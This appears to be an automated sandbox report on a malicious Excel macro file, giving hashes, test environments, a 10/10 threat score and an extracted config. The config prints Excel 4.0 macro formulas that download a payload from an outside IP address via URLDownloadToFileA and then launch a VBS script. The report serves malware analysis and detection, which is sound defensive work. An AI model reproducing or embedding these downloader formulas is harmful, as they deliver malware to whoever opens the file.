General
Target: 22524ecc99adf282778bb745f9efe38b
Size: 6KB
Sample: 231221-29hjgshgaq
MD5: 22524ecc99adf282778bb745f9efe38b
SHA1: b3d52e7a57fe9ea91ecb8d304dfe3118cade9043
SHA256: 024d02eecaa32686b99822fa17a628c03c2337efdd5cbb84f120c7a199551b11
SHA512: 7247d3b7c7ed0c81b5c7c7b43bcbb062b16c10a2de3c1a0ed6980d40a2ddd3e516d44a30be43f280ecb015cf8163cc7e15de3d1542c42874f1f3891c4574b97f
SSDEEP: 192:NDSHuSxbrA2OmmfRs8UhHFBFYu6b98yiekV+E:N4uyM2w61FY7b98yivJ
Static task: static1
Behavioral task: behavioral1
Sample: 22524ecc99adf282778bb745f9efe38b.xlsm
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 22524ecc99adf282778bb745f9efe38b.xlsm
Resource: win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.